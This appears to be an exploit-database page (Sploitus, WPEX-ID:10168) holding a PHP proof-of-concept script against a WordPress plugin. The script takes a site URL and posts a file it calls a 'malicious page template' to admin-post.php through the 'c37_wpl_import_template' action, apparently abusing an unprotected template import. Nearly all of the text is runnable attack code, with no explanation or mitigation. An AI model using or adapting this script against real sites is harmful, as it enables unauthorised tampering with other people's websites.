Share
## https://sploitus.com/exploit?id=WPEX-ID:10168
<?php
// Settings
$url = $argv[1]; //URL of the site
$urlbits = parse_url($url);
$wp_url = $urlbits['scheme'].'://'.$urlbits['host'].'/';

//Import a malicious page template
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . 'wp-admin/admin-post.php');
$cFile=curl_file_create(realpath('pocpage.tpl'));
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
	'action' => 'c37_wpl_import_template',
	'files_name[]' => $cFile,
]);
$output = curl_exec($ch);
echo $output;
curl_close($ch);